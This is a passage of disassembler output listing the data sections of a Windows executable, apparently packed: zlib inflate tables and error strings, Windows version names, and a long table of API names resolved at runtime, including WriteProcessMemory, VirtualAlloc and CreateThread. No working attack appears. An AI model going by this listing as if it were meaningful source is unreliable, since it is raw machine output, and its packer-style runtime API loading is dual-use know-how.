dword_50EA88 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_50A8AA+5�o
dd offset sub_50A9C8
align 8
dword_50EA98 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_50AB3D+5�o
dd offset sub_50AC33
align 8
dword_50EAA8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_50AEAA+5�o
dd offset loc_50AF44
align 8
dword_50EAB8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_50AFC6+5�o
dd offset sub_50B052
align 8
dword_50EAC8 dd 0FFFFFFFFh, 50B0E2h, 50B0E6h, 0FFFFFFFFh, 0 ; DATA XREF: sub_50B076+5�o
dd offset sub_50B15D
dword_50EAE0 dd 0FFFFFFFFh, 50B1C4h, 50B1C8h, 0 ; DATA XREF: sub_50B18D+5�o
dword_50EAF0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_50B2FE+5�o
dd offset sub_50B3B1
dword_50EAFC dd 0 ; DATA XREF: sub_4FCA80+57�o
; sub_4FCDBF+52�o
dword_50EB00 dd 2 dup(0) ; DATA XREF: sub_4FCA80+36�o
; sub_4FCDBF+39�o
dword_50EB08 dd 0FFFFFFFFh, 4FCB90h, 4FCB94h, 0FFFFFFFFh, 4FCC44h, 4FCC48h
; DATA XREF: sub_4FCA80+5�o
dword_50EB20 dd 0FFFFFFFFh, 4FCEB8h, 4FCEBCh, 10EB68h, 2 dup(0)
; DATA XREF: sub_4FCDBF+5�o
dd 10ECB8h, 10E000h, 10EBB8h, 2 dup(0)
dd 10ECEEh, 10E050h, 5 dup(0)
dd 10EBC4h, 10EBE0h, 10EBF2h, 10EBFEh, 10EC10h, 10EC1Eh
dd 10EC32h, 10EC4Ah, 10EC62h, 10EC76h, 10EC86h, 10EC9Ch
dd 10ED52h, 10ED42h, 10ED32h, 10ECFAh, 10ED06h, 10ED1Ch
dd 10ED64h, 0
dd 10ECC6h, 10ECD8h, 0
db 19h
db 2, 49h, 6Eh
aItializecrit_0 db 'itializeCriticalSection',0
dd 65470198h, 6F725074h, 64644163h, 73736572h, 2520000h
dd 61636F4Ch, 6572466Ch, 29B0065h, 73696152h, 63784565h
dd 69747065h, 6E6Fh, 6F4C024Eh, 416C6163h, 636F6C6Ch, 1770000h
dd 4D746547h, 6C75646Fh, 6E614865h, 41656C64h, 2470000h
aLeavecritica_1 db 'LeaveCriticalSection',0
align 2
aP_1 db '',0
aEntercritica_1 db 'EnterCriticalSection',0
align 2
dw 1ADh
aGetshortpathna db 'GetShortPathNameA',0
dw 2C5h
aResumethread db 'ResumeThread',0
align 2
dw 39Dh
aWriteprocessme db 'WriteProcessMemory',0
align 4
db 90h
db 1, 47h, 65h
aTprivateprofil db 'tPrivateProfileSectionA',0
aKernel32_dll_2 db 'KERNEL32.dll',0
align 2
aO_2 db '',0
aDefwindowpro_0 db 'DefWindowProcA',0
align 4
db 2
align 2
aAdjustwindowre db 'AdjustWindowRectEx',0
align 2
aUser32_dll_2 db 'USER32.dll',0
align 2
retf 5202h
; ---------------------------------------------------------------------------
aTlunwind db 'tlUnwind',0
dw 387h
aWidechartomu_0 db 'WideCharToMultiByte',0
db 6Bh ; k
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 23Ah
aLcmapstringa db 'LCMapStringA',0
align 2
dw 23Bh
aLcmapstringw db 'LCMapStringW',0
align 2
dw 1B2h
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 654701B5h, 72745374h, 54676E69h, 57657079h
db 2 dup(0)
_6 ends
; Section 8. (virtual address 0010F000)
; Virtual size : 00007110 ( 28944.)
; Section size in file : 00007110 ( 28944.)
; Offset to raw data for section: 0010F000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_7 segment para public 'CODE' use32
assume cs:_7
;org 50F000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
aInvalidBitLeng db 'invalid bit length repeat',0 ; DATA XREF: sub_50BC4B+81D�o
align 4
aTooManyLengthO db 'too many length or distance symbols',0 ; DATA XREF: sub_50BC4B+783�o
aInvalidStoredB db 'invalid stored block lengths',0 ; DATA XREF: sub_50BC4B+6CC�o
align 10h
aInvalidBlockTy db 'invalid block type',0 ; DATA XREF: sub_50BC4B+66B�o
align 4
aInvalidDistanc db 'invalid distance code',0 ; DATA XREF: sub_50C61A+4BB�o
; sub_50CBEB+23E�o
align 4
aInvalidLiteral db 'invalid literal/length code',0 ; DATA XREF: sub_50C61A+486�o
; sub_50CBEB+28D�o
byte_50F0A8 db 31h ; DATA XREF: sub_50CF41+15�r
; sub_50D9F3+2F�o
db 2Eh, 31h, 2Eh
dd 34h
aNeedDictionary db 'need dictionary',0 ; DATA XREF: sub_50D043+307�o
aIncorrectDataC db 'incorrect data check',0 ; DATA XREF: sub_50D043+230�o
align 4
aIncorrectHeade db 'incorrect header check',0 ; DATA XREF: sub_50D043+EC�o
align 10h
aInvalidWindowS db 'invalid window size',0 ; DATA XREF: sub_50D043+9C�o
aUnknownCompres db 'unknown compression method',0 ; DATA XREF: sub_50D043+79�o
align 10h
dword_50F120 dd 9 ; DATA XREF: sub_50D8AF+6�r
dword_50F124 dd 5 ; DATA XREF: sub_50D8AF+11�r
dword_50F128 dd 760h, 100h, 800h, 50h, 800h, 10h, 854h, 73h, 752h, 1Fh
; DATA XREF: sub_50D8AF+1C�o
dd 800h, 70h, 800h, 30h, 900h, 0C0h, 750h, 0Ah, 800h, 60h
dd 800h, 20h, 900h, 0A0h, 800h, 0
dd 800h, 80h, 800h, 40h, 900h, 0E0h, 750h, 6, 800h, 58h
dd 800h, 18h, 900h, 90h, 753h, 3Bh, 800h, 78h, 800h, 38h
dd 900h, 0D0h, 751h, 11h, 800h, 68h, 800h, 28h, 900h, 0B0h
dd 800h, 8, 800h, 88h, 800h, 48h, 900h, 0F0h, 750h, 4
dd 800h, 54h, 800h, 14h, 855h, 0E3h, 753h, 2Bh, 800h, 74h
dd 800h, 34h, 900h, 0C8h, 751h, 0Dh, 800h, 64h, 800h, 24h
dd 900h, 0A8h, 800h, 4, 800h, 84h, 800h, 44h, 900h, 0E8h
dd 750h, 8, 800h, 5Ch, 800h, 1Ch, 900h, 98h, 754h, 53h
dd 800h, 7Ch, 800h, 3Ch, 900h, 0D8h, 752h, 17h, 800h, 6Ch
dd 800h, 2Ch, 900h, 0B8h, 800h, 0Ch, 800h, 8Ch, 800h, 4Ch
dd 900h, 0F8h, 750h, 3, 800h, 52h, 800h, 12h, 855h, 0A3h
dd 753h, 23h, 800h, 72h, 800h, 32h, 900h, 0C4h, 751h, 0Bh
dd 800h, 62h, 800h, 22h, 900h, 0A4h, 800h, 2, 800h, 82h
dd 800h, 42h, 900h, 0E4h, 750h, 7, 800h, 5Ah, 800h, 1Ah
dd 900h, 94h, 754h, 43h, 800h, 7Ah, 800h, 3Ah, 900h, 0D4h
dd 752h, 13h, 800h, 6Ah, 800h, 2Ah, 900h, 0B4h, 800h, 0Ah
dd 800h, 8Ah, 800h, 4Ah, 900h, 0F4h, 750h, 5, 800h, 56h
dd 800h, 16h, 8C0h, 0
dd 753h, 33h, 800h, 76h, 800h, 36h, 900h, 0CCh, 751h, 0Fh
dd 800h, 66h, 800h, 26h, 900h, 0ACh, 800h, 6, 800h, 86h
dd 800h, 46h, 900h, 0ECh, 750h, 9, 800h, 5Eh, 800h, 1Eh
dd 900h, 9Ch, 754h, 63h, 800h, 7Eh, 800h, 3Eh, 900h, 0DCh
dd 752h, 1Bh, 800h, 6Eh, 800h, 2Eh, 900h, 0BCh, 800h, 0Eh
dd 800h, 8Eh, 800h, 4Eh, 900h, 0FCh, 760h, 100h, 800h
dd 51h, 800h, 11h, 855h, 83h, 752h, 1Fh, 800h, 71h, 800h
dd 31h, 900h, 0C2h, 750h, 0Ah, 800h, 61h, 800h, 21h, 900h
dd 0A2h, 800h, 1, 800h, 81h, 800h, 41h, 900h, 0E2h, 750h
dd 6, 800h, 59h, 800h, 19h, 900h, 92h, 753h, 3Bh, 800h
dd 79h, 800h, 39h, 900h, 0D2h, 751h, 11h, 800h, 69h, 800h
dd 29h, 900h, 0B2h, 800h, 9, 800h, 89h, 800h, 49h, 900h
dd 0F2h, 750h, 4, 800h, 55h, 800h, 15h, 850h, 102h, 753h
dd 2Bh, 800h, 75h, 800h, 35h, 900h, 0CAh, 751h, 0Dh, 800h
dd 65h, 800h, 25h, 900h, 0AAh, 800h, 5, 800h, 85h, 800h
dd 45h, 900h, 0EAh, 750h, 8, 800h, 5Dh, 800h, 1Dh, 900h
dd 9Ah, 754h, 53h, 800h, 7Dh, 800h, 3Dh, 900h, 0DAh, 752h
dd 17h, 800h, 6Dh, 800h, 2Dh, 900h, 0BAh, 800h, 0Dh, 800h
dd 8Dh, 800h, 4Dh, 900h, 0FAh, 750h, 3, 800h, 53h, 800h
dd 13h, 855h, 0C3h, 753h, 23h, 800h, 73h, 800h, 33h, 900h
dd 0C6h, 751h, 0Bh, 800h, 63h, 800h, 23h, 900h, 0A6h, 800h
dd 3, 800h, 83h, 800h, 43h, 900h, 0E6h, 750h, 7, 800h
dd 5Bh, 800h, 1Bh, 900h, 96h, 754h, 43h, 800h, 7Bh, 800h
dd 3Bh, 900h, 0D6h, 752h, 13h, 800h, 6Bh, 800h, 2Bh, 900h
dd 0B6h, 800h, 0Bh, 800h, 8Bh, 800h, 4Bh, 900h, 0F6h, 750h
dd 5, 800h, 57h, 800h, 17h, 8C0h, 0
dd 753h, 33h, 800h, 77h, 800h, 37h, 900h, 0CEh, 751h, 0Fh
dd 800h, 67h, 800h, 27h, 900h, 0AEh, 800h, 7, 800h, 87h
dd 800h, 47h, 900h, 0EEh, 750h, 9, 800h, 5Fh, 800h, 1Fh
dd 900h, 9Eh, 754h, 63h, 800h, 7Fh, 800h, 3Fh, 900h, 0DEh
dd 752h, 1Bh, 800h, 6Fh, 800h, 2Fh, 900h, 0BEh, 800h, 0Fh
dd 800h, 8Fh, 800h, 4Fh, 900h, 0FEh, 760h, 100h, 800h
dd 50h, 800h, 10h, 854h, 73h, 752h, 1Fh, 800h, 70h, 800h
dd 30h, 900h, 0C1h, 750h, 0Ah, 800h, 60h, 800h, 20h, 900h
dd 0A1h, 800h, 0
dd 800h, 80h, 800h, 40h, 900h, 0E1h, 750h, 6, 800h, 58h
dd 800h, 18h, 900h, 91h, 753h, 3Bh, 800h, 78h, 800h, 38h
dd 900h, 0D1h, 751h, 11h, 800h, 68h, 800h, 28h, 900h, 0B1h
dd 800h, 8, 800h, 88h, 800h, 48h, 900h, 0F1h, 750h, 4
dd 800h, 54h, 800h, 14h, 855h, 0E3h, 753h, 2Bh, 800h, 74h
dd 800h, 34h, 900h, 0C9h, 751h, 0Dh, 800h, 64h, 800h, 24h
dd 900h, 0A9h, 800h, 4, 800h, 84h, 800h, 44h, 900h, 0E9h
dd 750h, 8, 800h, 5Ch, 800h, 1Ch, 900h, 99h, 754h, 53h
dd 800h, 7Ch, 800h, 3Ch, 900h, 0D9h, 752h, 17h, 800h, 6Ch
dd 800h, 2Ch, 900h, 0B9h, 800h, 0Ch, 800h, 8Ch, 800h, 4Ch
dd 900h, 0F9h, 750h, 3, 800h, 52h, 800h, 12h, 855h, 0A3h
dd 753h, 23h, 800h, 72h, 800h, 32h, 900h, 0C5h, 751h, 0Bh
dd 800h, 62h, 800h, 22h, 900h, 0A5h, 800h, 2, 800h, 82h
dd 800h, 42h, 900h, 0E5h, 750h, 7, 800h, 5Ah, 800h, 1Ah
dd 900h, 95h, 754h, 43h, 800h, 7Ah, 800h, 3Ah, 900h, 0D5h
dd 752h, 13h, 800h, 6Ah, 800h, 2Ah, 900h, 0B5h, 800h, 0Ah
dd 800h, 8Ah, 800h, 4Ah, 900h, 0F5h, 750h, 5, 800h, 56h
dd 800h, 16h, 8C0h, 0
dd 753h, 33h, 800h, 76h, 800h, 36h, 900h, 0CDh, 751h, 0Fh
dd 800h, 66h, 800h, 26h, 900h, 0ADh, 800h, 6, 800h, 86h
dd 800h, 46h, 900h, 0EDh, 750h, 9, 800h, 5Eh, 800h, 1Eh
dd 900h, 9Dh, 754h, 63h, 800h, 7Eh, 800h, 3Eh, 900h, 0DDh
dd 752h, 1Bh, 800h, 6Eh, 800h, 2Eh, 900h, 0BDh, 800h, 0Eh
dd 800h, 8Eh, 800h, 4Eh, 900h, 0FDh, 760h, 100h, 800h
dd 51h, 800h, 11h, 855h, 83h, 752h, 1Fh, 800h, 71h, 800h
dd 31h, 900h, 0C3h, 750h, 0Ah, 800h, 61h, 800h, 21h, 900h
dd 0A3h, 800h, 1, 800h, 81h, 800h, 41h, 900h, 0E3h, 750h
dd 6, 800h, 59h, 800h, 19h, 900h, 93h, 753h, 3Bh, 800h
dd 79h, 800h, 39h, 900h, 0D3h, 751h, 11h, 800h, 69h, 800h
dd 29h, 900h, 0B3h, 800h, 9, 800h, 89h, 800h, 49h, 900h
dd 0F3h, 750h, 4, 800h, 55h, 800h, 15h, 850h, 102h, 753h
dd 2Bh, 800h, 75h, 800h, 35h, 900h, 0CBh, 751h, 0Dh, 800h
dd 65h, 800h, 25h, 900h, 0ABh, 800h, 5, 800h, 85h, 800h
dd 45h, 900h, 0EBh, 750h, 8, 800h, 5Dh, 800h, 1Dh, 900h
dd 9Bh, 754h, 53h, 800h, 7Dh, 800h, 3Dh, 900h, 0DBh, 752h
dd 17h, 800h, 6Dh, 800h, 2Dh, 900h, 0BBh, 800h, 0Dh, 800h
dd 8Dh, 800h, 4Dh, 900h, 0FBh, 750h, 3, 800h, 53h, 800h
dd 13h, 855h, 0C3h, 753h, 23h, 800h, 73h, 800h, 33h, 900h
dd 0C7h, 751h, 0Bh, 800h, 63h, 800h, 23h, 900h, 0A7h, 800h
dd 3, 800h, 83h, 800h, 43h, 900h, 0E7h, 750h, 7, 800h
dd 5Bh, 800h, 1Bh, 900h, 97h, 754h, 43h, 800h, 7Bh, 800h
dd 3Bh, 900h, 0D7h, 752h, 13h, 800h, 6Bh, 800h, 2Bh, 900h
dd 0B7h, 800h, 0Bh, 800h, 8Bh, 800h, 4Bh, 900h, 0F7h, 750h
dd 5, 800h, 57h, 800h, 17h, 8C0h, 0
dd 753h, 33h, 800h, 77h, 800h, 37h, 900h, 0CFh, 751h, 0Fh
dd 800h, 67h, 800h, 27h, 900h, 0AFh, 800h, 7, 800h, 87h
dd 800h, 47h, 900h, 0EFh, 750h, 9, 800h, 5Fh, 800h, 1Fh
dd 900h, 9Fh, 754h, 63h, 800h, 7Fh, 800h, 3Fh, 900h, 0DFh
dd 752h, 1Bh, 800h, 6Fh, 800h, 2Fh, 900h, 0BFh, 800h, 0Fh
dd 800h, 8Fh, 800h, 4Fh, 900h, 0FFh
dword_510128 dd 550h, 1, 557h, 101h, 553h, 11h, 55Bh, 1001h, 551h, 5
; DATA XREF: sub_50D8AF+25�o
dd 559h, 401h, 555h, 41h, 55Dh, 4001h, 550h, 3, 558h, 201h
dd 554h, 21h, 55Ch, 2001h, 552h, 9, 55Ah, 801h, 556h, 81h
dd 5C0h, 6001h, 550h, 2, 557h, 181h, 553h, 19h, 55Bh, 1801h
dd 551h, 7, 559h, 601h, 555h, 61h, 55Dh, 6001h, 550h, 4
dd 558h, 301h, 554h, 31h, 55Ch, 3001h, 552h, 0Dh, 55Ah
dd 0C01h, 556h, 0C1h, 5C0h, 6001h
aIncompleteDyna db 'incomplete dynamic bit lengths tree',0 ; DATA XREF: sub_50D3A6+66�o
aOversubscribed db 'oversubscribed dynamic bit lengths tree',0 ; DATA XREF: sub_50D3A6+4E�o
aIncompleteLite db 'incomplete literal/length tree',0 ; DATA XREF: sub_50D7AC:loc_50D891�o
align 4
aOversubscrib_1 db 'oversubscribed literal/length tree',0 ; DATA XREF: sub_50D7AC+D7�o
align 4
aEmptyDistanceT db 'empty distance tree with lengths',0 ; DATA XREF: sub_50D7AC:loc_50D875�o
align 4
aIncompleteDist db 'incomplete distance tree',0 ; DATA XREF: sub_50D7AC+BB�o
align 4
aOversubscrib_0 db 'oversubscribed distance tree',0 ; DATA XREF: sub_50D7AC+AD�o
align 4
dword_510318 dd 0 ; DATA XREF: sub_50BC4B:loc_50C07F�r
; sub_50BC4B+4C0�r ...
dd 1, 3, 7, 0Fh, 1Fh, 3Fh, 7Fh, 0FFh, 1FFh, 3FFh, 7FFh
dd 0FFFh, 1FFFh, 3FFFh, 7FFFh, 0FFFFh
aGetcurrentproc db 'GetCurrentProcess',0 ; DATA XREF: sub_4FD2E0+1E4�o
; sub_4FE2E0+16B�o
align 10h
aFlushinstructi db 'FlushInstructionCache',0 ; DATA XREF: sub_4FD2E0:loc_4FD4B0�o
align 4
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: sub_4FD2E0+1AB�o
; sub_4FDDD0+1D�o ...
align 4
aBarier db 'BARIER',0 ; DATA XREF: sub_4FD2E0+4C�o
align 10h
aWindowsntUnkno db 'WindowsNT(unknown)',0 ; DATA XREF: _5:loc_4FE1D5�o
; _5:loc_4FE1E1�o
align 4
aWindows_net db 'Windows.NET',0 ; DATA XREF: _5:004FE1C9�o
aWindowsxp db 'WindowsXP',0 ; DATA XREF: _5:004FE1B1�o
align 4
aWindows2000 db 'Windows2000',0 ; DATA XREF: _5:004FE199�o
aWindowsnt4_0 db 'WindowsNT(4.0)',0 ; DATA XREF: _5:004FE175�o
align 4
aWindowsnt3_51 db 'WindowsNT(3.51)',0 ; DATA XREF: _5:004FE15A�o
aWindows9xUnkno db 'Windows9x(unknown)',0 ; DATA XREF: _5:loc_4FE13F�o
align 4
aWindowsme db 'WindowsMe',0 ; DATA XREF: _5:004FE133�o
align 4
aWindows98 db 'Windows98',0 ; DATA XREF: _5:004FE11B�o
align 4
aWindows95 db 'Windows95',0 ; DATA XREF: _5:004FE103�o
align 10h
aWin32s db 'win32s',0 ; DATA XREF: _5:loc_4FE0E8�o
align 4
aVirtualalloc db 'VirtualAlloc',0 ; DATA XREF: _5:loc_4FDE99�o
; sub_4FE2E0+52B�o
align 4
aCreatethread db 'CreateThread',0 ; DATA XREF: sub_4FE2E0+86D�o
align 4
aPostmessagea db 'PostMessageA',0 ; DATA XREF: sub_4FE2E0+859�o
align 4
aDefwindowproca db 'DefWindowProcA',0 ; DATA XREF: sub_4FE2E0+845�o
align 4
aEnumwindows db 'EnumWindows',0 ; DATA XREF: sub_4FE2E0+831�o
aDestroywindo_0 db 'DestroyWindow',0 ; DATA XREF: sub_4FE2E0+81D�o
align 4
aDispatchmessag db 'DispatchMessageA',0 ; DATA XREF: sub_4FE2E0+809�o
align 4
aTranslatemessa db 'TranslateMessage',0 ; DATA XREF: sub_4FE2E0+7F5�o
align 4
aGetmessagea db 'GetMessageA',0 ; DATA XREF: sub_4FE2E0+7E1�o
aCreatewindowex db 'CreateWindowExA',0 ; DATA XREF: sub_4FE2E0+7CD�o
aGetsystemmetri db 'GetSystemMetrics',0 ; DATA XREF: sub_4FE2E0+7B9�o
align 4
aRegisterclasse db 'RegisterClassExA',0 ; DATA XREF: sub_4FE2E0+7A5�o
align 10h
aSetforegroundw db 'SetForegroundWindow',0 ; DATA XREF: sub_4FE2E0+791�o
aSetactivewindo db 'SetActiveWindow',0 ; DATA XREF: sub_4FE2E0+77D�o
aGetwindowthrea db 'GetWindowThreadProcessId',0 ; DATA XREF: sub_4FE2E0+769�o
align 10h
aBitblt_0 db 'BitBlt',0 ; DATA XREF: sub_4FE2E0+755�o
align 4
aDeleteobject_0 db 'DeleteObject',0 ; DATA XREF: sub_4FE2E0+741�o
align 4
aSelectobject_0 db 'SelectObject',0 ; DATA XREF: sub_4FE2E0+72D�o
align 4
aGetobjecta db 'GetObjectA',0 ; DATA XREF: sub_4FE2E0+719�o
align 4
aEndpaint db 'EndPaint',0 ; DATA XREF: sub_4FE2E0+705�o
align 10h
aBeginpaint db 'BeginPaint',0 ; DATA XREF: sub_4FE2E0+6F1�o
align 4
aRemovefontreso db 'RemoveFontResourceA',0 ; DATA XREF: sub_4FE2E0+6DD�o
aDeletedc_0 db 'DeleteDC',0 ; DATA XREF: sub_4FE2E0+6C9�o
align 4
aCreatedibsec_0 db 'CreateDIBSection',0 ; DATA XREF: sub_4FE2E0+6B5�o
align 10h
aCreatecompat_0 db 'CreateCompatibleDC',0 ; DATA XREF: sub_4FE2E0+6A1�o
align 4
aAddfontresourc db 'AddFontResourceA',0 ; DATA XREF: sub_4FE2E0:loc_4FE96D�o
align 4
aGdi32_dll_0 db 'gdi32.dll',0 ; DATA XREF: sub_4FE2E0+668�o
align 4
aWvsprintfa db 'wvsprintfA',0 ; DATA XREF: sub_4FE2E0+654�o
align 10h
aWsprintfa_0 db 'wsprintfA',0 ; DATA XREF: sub_4FE2E0+640�o
align 4
aMessageboxa_0 db 'MessageBoxA',0 ; DATA XREF: sub_4FE2E0+62C�o
aLoadimagea db 'LoadImageA',0 ; DATA XREF: sub_4FE2E0+618�o
align 4
aCharupperbuffa db 'CharUpperBuffA',0 ; DATA XREF: sub_4FE2E0+604�o
align 4
aChangedisplays db 'ChangeDisplaySettingsA',0 ; DATA XREF: sub_4FE2E0:loc_4FE8D0�o
align 4
aUser32_dll_1 db 'user32.dll',0 ; DATA XREF: sub_4FE2E0+5CB�o
align 4
aLstrcmpia db 'lstrcmpiA',0 ; DATA XREF: sub_4FE2E0+5B7�o
align 4
aWritefile db 'WriteFile',0 ; DATA XREF: sub_4FE2E0+5A3�o
; sub_509F43+153�o
align 10h
aWidechartomult db 'WideCharToMultiByte',0 ; DATA XREF: sub_4FE2E0+58F�o
aWaitforsingleo db 'WaitForSingleObject',0 ; DATA XREF: sub_4FE2E0+57B�o
; sub_507494+1D4�o
aVirtualquery db 'VirtualQuery',0 ; DATA XREF: sub_4FE2E0+567�o
align 4
aVirtualprotect db 'VirtualProtect',0 ; DATA XREF: sub_4FE2E0+553�o
align 4
aVirtualfree db 'VirtualFree',0 ; DATA XREF: sub_4FE2E0+53F�o
aUnmapviewoffil db 'UnmapViewOfFile',0 ; DATA XREF: sub_4FE2E0+517�o
aUnlockfile db 'UnlockFile',0 ; DATA XREF: sub_4FE2E0+503�o
align 10h
aTerminateproce db 'TerminateProcess',0 ; DATA XREF: sub_4FE2E0+4EF�o
align 4
aSleep db 'Sleep',0 ; DATA XREF: sub_4FE2E0+4DB�o
; sub_507494+25E�o
align 4
aSetunhandledex db 'SetUnhandledExceptionFilter',0 ; DATA XREF: sub_4FE2E0+4C7�o
aSetlasterror db 'SetLastError',0 ; DATA XREF: sub_4FE2E0+4B3�o
align 4
aSetfilepointer db 'SetFilePointer',0 ; DATA XREF: sub_4FE2E0+49F�o
align 4
aSetevent db 'SetEvent',0 ; DATA XREF: sub_4FE2E0+48B�o
align 4
aSetenvironment db 'SetEnvironmentVariableA',0 ; DATA XREF: sub_4FE2E0+477�o
aReadfile_0 db 'ReadFile',0 ; DATA XREF: sub_4FE2E0+463�o
align 4
aRaiseexception db 'RaiseException',0 ; DATA XREF: sub_4FE2E0+44F�o
align 4
aOpenprocess db 'OpenProcess',0 ; DATA XREF: sub_4FE2E0+43B�o
; sub_507494+230�o
aMultibytetowid db 'MultiByteToWideChar',0 ; DATA XREF: sub_4FE2E0+427�o
aMapviewoffile db 'MapViewOfFile',0 ; DATA XREF: sub_4FE2E0+413�o
align 4
aLockfile db 'LockFile',0 ; DATA XREF: sub_4FE2E0+3FF�o
align 4
aLocalfree db 'LocalFree',0 ; DATA XREF: sub_4FE2E0+3EB�o
align 10h
aLocalalloc db 'LocalAlloc',0 ; DATA XREF: sub_4FE2E0+3D7�o
align 4
aLoadlibraryexa db 'LoadLibraryExA',0 ; DATA XREF: sub_4FE2E0+3C3�o
align 4
aLoadlibrarya db 'LoadLibraryA',0 ; DATA XREF: sub_4FE2E0+3AF�o
align 4
aLeavecriticals db 'LeaveCriticalSection',0 ; DATA XREF: sub_4FE2E0+39B�o
align 4
aDeletecritical db 'DeleteCriticalSection',0 ; DATA XREF: sub_4FE2E0+387�o
align 4
aInitializecrit db 'InitializeCriticalSection',0 ; DATA XREF: sub_4FE2E0+373�o
align 4
aHeapcreate db 'HeapCreate',0 ; DATA XREF: sub_4FE2E0+35F�o
align 4
aHeapfree db 'HeapFree',0 ; DATA XREF: sub_4FE2E0+34B�o
align 10h
aHeapalloc db 'HeapAlloc',0 ; DATA XREF: sub_4FE2E0+337�o
align 4
aGettickcount db 'GetTickCount',0 ; DATA XREF: sub_4FE2E0+323�o
align 4
aGetversionexa db 'GetVersionExA',0 ; DATA XREF: sub_4FE2E0+30F�o
align 4
aGettemppatha db 'GetTempPathA',0 ; DATA XREF: sub_4FE2E0+2FB�o
; sub_507494+92�o
align 4
aGettempfilenam db 'GetTempFileNameA',0 ; DATA XREF: sub_4FE2E0+2E7�o
align 10h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0 ; DATA XREF: sub_4FE2E0+2D3�o
aGetprocaddress db 'GetProcAddress',0 ; DATA XREF: sub_4FE2E0+2BF�o
align 4
aGetprivatepr_1 db 'GetPrivateProfileStringA',0 ; DATA XREF: sub_4FE2E0+2AB�o
align 4
aGetprivatepr_0 db 'GetPrivateProfileSectionNamesA',0 ; DATA XREF: sub_4FE2E0+297�o
align 4
aGetprivateprof db 'GetPrivateProfileIntA',0 ; DATA XREF: sub_4FE2E0+283�o
align 4
aGetmodulehandl db 'GetModuleHandleA',0 ; DATA XREF: sub_4FE2E0+26F�o
align 10h
aGetmodulefilen db 'GetModuleFileNameA',0 ; DATA XREF: sub_4FE2E0+25B�o
align 4
aGetlasterror db 'GetLastError',0 ; DATA XREF: sub_4FE2E0+247�o
align 4
aGetfullpathn_0 db 'GetFullPathNameW',0 ; DATA XREF: sub_4FE2E0+233�o
align 4
aGetfullpathnam db 'GetFullPathNameA',0 ; DATA XREF: sub_4FE2E0+21F�o
align 4
aGetfiletime db 'GetFileTime',0 ; DATA XREF: sub_4FE2E0+20B�o
aGetfilesize db 'GetFileSize',0 ; DATA XREF: sub_4FE2E0+1F7�o
aGetfileinforma db 'GetFileInformationByHandle',0 ; DATA XREF: sub_4FE2E0+1E3�o
align 10h
aGetfileattri_0 db 'GetFileAttributesW',0 ; DATA XREF: sub_4FE2E0+1CF�o
align 4
aGetfileattribu db 'GetFileAttributesA',0 ; DATA XREF: sub_4FE2E0+1BB�o
align 4
aGetexitcodepro db 'GetExitCodeProcess',0 ; DATA XREF: sub_4FE2E0+1A7�o
; sub_507494+1A6�o
align 4
aGetenvironment db 'GetEnvironmentVariableA',0 ; DATA XREF: sub_4FE2E0+193�o
aGetcurrentpr_0 db 'GetCurrentProcessId',0 ; DATA XREF: sub_4FE2E0+17F�o
; sub_5058A0+11�o
aFreelibrary db 'FreeLibrary',0 ; DATA XREF: sub_4FE2E0+157�o
aFormatmessagea db 'FormatMessageA',0 ; DATA XREF: sub_4FE2E0+143�o
align 4
aFlushfilebuffe db 'FlushFileBuffers',0 ; DATA XREF: sub_4FE2E0+12F�o
align 4
aFindnextfilea db 'FindNextFileA',0 ; DATA XREF: sub_4FE2E0+11B�o
align 4
aFindfirstfilea db 'FindFirstFileA',0 ; DATA XREF: sub_4FE2E0+107�o
; sub_507494+11C�o
align 4
aFindclose db 'FindClose',0 ; DATA XREF: sub_4FE2E0+F3�o
; sub_507494+178�o
align 4
aExitprocess db 'ExitProcess',0 ; DATA XREF: sub_4FE2E0+DF�o
; sub_507494+202�o
aEntercriticals db 'EnterCriticalSection',0 ; DATA XREF: sub_4FE2E0+CB�o
align 4
aDeletefilea db 'DeleteFileA',0 ; DATA XREF: sub_4FE2E0+B7�o
; sub_507494+14A�o
aDebugbreak db 'DebugBreak',0 ; DATA XREF: sub_4FE2E0+A3�o
align 10h
aCreateprocessa db 'CreateProcessA',0 ; DATA XREF: sub_4FE2E0+8F�o
align 10h
aCreatefilema_0 db 'CreateFileMappingW',0 ; DATA XREF: sub_4FE2E0+7B�o
align 4
aCreatefilemapp db 'CreateFileMappingA',0 ; DATA XREF: sub_4FE2E0+67�o
align 4
aCreatefilew db 'CreateFileW',0 ; DATA XREF: sub_4FE2E0+53�o
aCreatefilea db 'CreateFileA',0 ; DATA XREF: sub_4FE2E0+3F�o
aClosehandle db 'CloseHandle',0 ; DATA XREF: sub_4FE2E0:loc_4FE30B�o
; sub_507494+28C�o
aApiNopefunc db ':API:NopeFunc',0 ; DATA XREF: sub_50DAB0+3�o
align 4
aMbx db 'mbx',0 ; DATA XREF: sub_4FF94C+19E�o
aBoxReadcompres db ':BOX:ReadCompressedSection: decompresion failed with code %d',0
; DATA XREF: sub_500C5C+340�o
align 10h
a? db '\\?\',0 ; DATA XREF: sub_50153F+56�o
align 4
dword_510B68 dd 1Eh ; DATA XREF: sub_502DD0+5A�w
align 10h
dword_510B70 dd 2 dup(0) ; DATA XREF: sub_500C5C+B6�o
; sub_500C5C+DB�o ...
dword_510B78 dd 0 ; DATA XREF: sub_500C5C+73�r
; sub_500C5C+F9�w ...
dword_510B7C dd 0 ; DATA XREF: sub_500C5C+63�r
; sub_500C5C+106�w ...
off_510B80 dd offset dword_5118FC ; DATA XREF: sub_500C5C+84�r
; sub_500C5C+125�r
dd 5 dup(0)
dd offset dword_511900
dd 5 dup(0)
dd offset dword_511904
align 8
aKernel32_0 db 'kernel32',0 ; DATA XREF: sub_502DD0+E2�o
; sub_50A8AA:loc_50A995�o ...
align 4
aGetlongpathnam db 'GetLongPathNameA',0 ; DATA XREF: sub_502DD0+DD�o
; sub_50AAEB+27�o
align 4
dword_510BD8 dd 584F424Dh ; DATA XREF: sub_503610:loc_5039B0�r
; sub_503610+3C4�o
align 10h
dword_510BE0 dd 2Ah ; DATA XREF: sub_4FC06B+5A�o
